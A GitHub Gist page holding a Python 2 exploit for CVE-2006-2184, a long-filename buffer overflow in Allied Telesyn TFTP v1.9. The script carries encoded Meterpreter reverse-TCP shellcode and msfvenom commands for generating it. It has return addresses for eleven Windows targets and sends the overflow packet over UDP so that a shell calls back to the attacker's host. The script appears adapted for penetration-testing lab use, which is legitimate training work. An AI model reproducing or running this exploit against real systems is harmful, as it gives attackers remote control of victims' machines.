Last active
October 16, 2022 15:37
-
-
Save AfroThundr3007730/bc29e9f3475401657b2dc1aa97142545 to your computer and use it in GitHub Desktop.
Modified version of CVE-2006-2184 python script found here: https://github.com/Re4son/AT-TFTP_Long_Filename/blob/master/attftp_long_filename.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import sys | |
import struct | |
import socket as so | |
print '#######################################################################' | |
print '# CVE-2006-2184 - Allied Telesyn TFTP v1.9 Long Filename Overflow #' | |
print '# This is a modified version of Re4son\'s code #' | |
print '# (https://github.com/Re4son/AT-TFTP_Long_Filename) #' | |
print '# The return addresses are ported from metasploit module #' | |
print '# exploit/windows/tftp/attftp_long_filename #' | |
print '#######################################################################\n' | |
# Shellcode - Staged Meterpreter Reverse TCP (NONX) | |
# Badchars: \x00 | |
# StackAdjustment: -3500 | |
# Payload size: 210 bytes | |
# Generation instructions: | |
# printf '\x81\xec\xac\x0d\x00\x00' > payload # sub exp, 0xdac / nop / nop | |
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.0.95 LPORT=443 \ | |
# -a x86 --platform Windows -e generic/none -f raw >> payload | |
# cat payload | msfvenom -p - -e x86/shikata_ga_nai -b "\x00" -f c | |
SHELLCODE = ( | |
"\xdb\xd6\xd9\x74\x24\xf4\xbe\xcf\xa5\x10\xfb\x5f\x29\xc9\xb1\x2e" | |
"\x83\xc7\x04\x31\x77\x16\x03\x77\x16\xe2\x3a\x24\xfc\x57\xc9\x27" | |
"\xfd\x5b\xbb\xcc\xba\x4b\xc2\xec\xba\x73\x54\x22\x9e\x07\xe9\x78" | |
"\xab\x64\x2c\xf9\xaa\x7b\xc5\xae\x8c\x82\x33\xdb\xf9\x1e\xc2\x32" | |
"\x30\xdf\x5d\x66\xf2\x15\x50\x76\x37\x2d\xaa\x0d\x41\x6d\x4c\xd7" | |
"\x67\x07\x73\x6c\xf3\xa7\x57\x72\xea\x5e\x1c\x68\xb5\x15\x6d\x8d" | |
"\x44\xc3\x72\x81\xdf\x9a\x18\xfd\xc3\xfd\x1f\x1d\xca\x26\xbb\x55" | |
"\x6e\xe9\xc8\x2a\x7d\x82\xbe\xb6\xd0\x1f\x56\xcf\x74\x46\xf5\xa9" | |
"\xe0\xb5\xcb\x5d\x86\xca\x19\xc1\x3c\x4b\xe4\x8f\xdc\x6c\xc0\xe5" | |
"\x4e\xc0\xbf\x56\x32\xb5\x7c\x0a\x3d\xde\xe4\x2d\xd2\x29\xea\x7a" | |
"\x7e\x4c\x53\x63\x5f\x6f\x75\x0a\xd9\x38\x16\x2c\xcf\xae\x80\xd8" | |
"\xfb\xd0\x0f\xbb\x93\xd1\x14\x25\x37\x5b\x89\xc0\xa7\x08\x1a\x73" | |
"\x71\xf9\xa1\x84\x57\x56\x1d\x76\x08\x04\x0a\xd4\xce\x13\x74\xe2" | |
"\xf1\x82" | |
) | |
def set_return(target): | |
if target == '1': | |
print '[+] Selecting target: Windows NT SP4 English' | |
retaddr = struct.pack('<L', 0x702ea6f7) | |
elif target == '2': | |
print '[+] Selecting target: Windows 2000 SP0 English' | |
retaddr = struct.pack('<L', 0x750362c3) | |
elif target == '3': | |
print '[+] Selecting target: Windows 2000 SP1 English' | |
retaddr = struct.pack('<L', 0x75031d85) | |
elif target == '4': | |
print '[+] Selecting target: Windows 2000 SP2 English' | |
retaddr = struct.pack('<L', 0x7503431b) | |
elif target == '5': | |
print '[+] Selecting target: Windows 2000 SP3 English' | |
retaddr = struct.pack('<L', 0x74fe1c5a) | |
elif target == '6': | |
print '[+] Selecting target: Windows 2000 SP4 English' | |
retaddr = struct.pack('<L', 0x75031dce) | |
elif target == '7': | |
print '[+] Selecting target: Windows XP SP0/1 English' | |
retaddr = struct.pack('<L', 0x71ab7bfb) | |
elif target == '8': | |
print '[+] Selecting target: Windows XP SP2 English' | |
retaddr = struct.pack('<L', 0x71ab9372) | |
elif target == '9': | |
print '[+] Selecting target: Windows XP SP3 English' | |
retaddr = struct.pack('<L', 0x7e429353) # ret by c0re | |
elif target == '10': | |
print '[+] Selecting target: Windows Server 2003' | |
retaddr = struct.pack('<L', 0x7c86fed3) # ret donated by securityxxxpert | |
elif target == '11': | |
print '[+] Selecting target: Windows Server 2003 SP2' | |
retaddr = struct.pack('<L', 0x7c86a01b) # ret donated by Polar Bear | |
else: | |
print '[-] Target not supported or invalid target specified!' | |
sys.exit(-1) | |
return retaddr | |
def build_payload(shellcode, retaddr, lhost): | |
# Let's build the payload | |
print '[+] Constructing payload.' | |
# Create NOP sled to brin NOPs & LHOST to 25 bytes | |
nops = "\x90" * (25 - len(lhost)) | |
tail = "" # tail from metasploit | |
tail += "\x83\xc4\x28\xc3" # add esp, 0x28 / ret | |
tail += "\x00netascii\x00" # Finish as expected by the AT TFTP server | |
payload = "\x00\x02" + nops + shellcode + retaddr + tail | |
return payload | |
def send_packet(payload, rhost, rport): | |
# Declare a UDP socket | |
s = so.socket(so.AF_INET, so.SOCK_DGRAM) | |
print "[+] Delivering package..." | |
try: | |
s.sendto(payload, (rhost, rport)) | |
except OSError: | |
print "[-] Could not connect to " + rhost + ":" + str(rport) + "!" | |
sys.exit(-1) | |
print "[+] Package delivered!" | |
def main(): | |
try: | |
RHOST = sys.argv[1] # Target IP address as command line argument | |
RPORT = int(sys.argv[2]) # Target Port as command line argument | |
LHOST = sys.argv[3] # Attackers IP address | |
TARGET = sys.argv[4] if len(sys.argv) > 4 else '10' # The target system | |
except IndexError: | |
print '[-] Usage: %s <RHOST> <RPORT> <LHOST> [<TARGET>]' % sys.argv[0] | |
print '[-] Example: %s 10.11.1.226 69 10.11.0.95' % sys.argv[0] | |
print '[-]' | |
print '[-] Available Targets (* = Default):' | |
print '[-] 1 - Windows NT SP4 English' | |
print '[-] 2 - Windows 2000 SP0 English' | |
print '[-] 3 - Windows 2000 SP1 English' | |
print '[-] 4 - Windows 2000 SP2 English' | |
print '[-] 5 - Windows 2000 SP3 English' | |
print '[-] 6 - Windows 2000 SP4 English' | |
print '[-] 7 - Windows XP SP0/1 English' | |
print '[-] 8 - Windows XP SP2 English' | |
print '[-] 9 - Windows XP SP3 English' | |
print '[-] * 10 - Windows Server 2003' | |
print '[-] 11 - Windows Server 2003 SP2' | |
sys.exit(-1) | |
RETADDR = set_return(TARGET) | |
PAYLOAD = build_payload(SHELLCODE, RETADDR, LHOST) | |
send_packet(PAYLOAD, RHOST, RPORT) | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Refactored and added target selection logic.